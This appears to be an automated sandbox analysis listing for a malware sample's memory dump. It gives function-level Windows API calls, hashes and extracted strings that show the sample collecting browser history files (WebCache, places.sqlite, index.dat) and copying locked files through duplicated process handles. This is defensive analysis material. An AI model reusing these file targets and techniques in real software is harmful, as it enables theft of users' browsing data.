                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2911713577-0
                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp
                                                                                  • String ID: @ $SQLite format 3
                                                                                  • API String ID: 1475443563-3708268960
                                                                                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 2705122986-2036018995
                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmpqsort
                                                                                  • String ID: /nosort$/sort
                                                                                  • API String ID: 1579243037-1578091866
                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Strings
                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                  • API String ID: 3354267031-2114579845
                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                  • API String ID: 2221118986-1725073988
                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotificationSleep
                                                                                  • String ID: }A
                                                                                  • API String ID: 1821831730-2138825249
                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@DeleteObject
                                                                                  • String ID: r!A
                                                                                  • API String ID: 1103273653-628097481
                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1033339047-0
                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                  • memcmp.MSVCRT ref: 00444BA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$memcmp
                                                                                  • String ID: $$8
                                                                                  • API String ID: 2808797137-435121686
                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                  • String ID:
                                                                                  • API String ID: 1042154641-0
                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                  • String ID: history.dat$places.sqlite
                                                                                  • API String ID: 3093078384-467022611
                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                  • String ID:
                                                                                  • API String ID: 839530781-0
                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID: *.*$index.dat
                                                                                  • API String ID: 1974802433-2863569691
                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@mallocmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3831604043-0
                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                  • String ID:
                                                                                  • API String ID: 1631957507-0
                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1125800050-0
                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: BINARY
                                                                                  • API String ID: 2221118986-907554435
                                                                                  • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                  • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
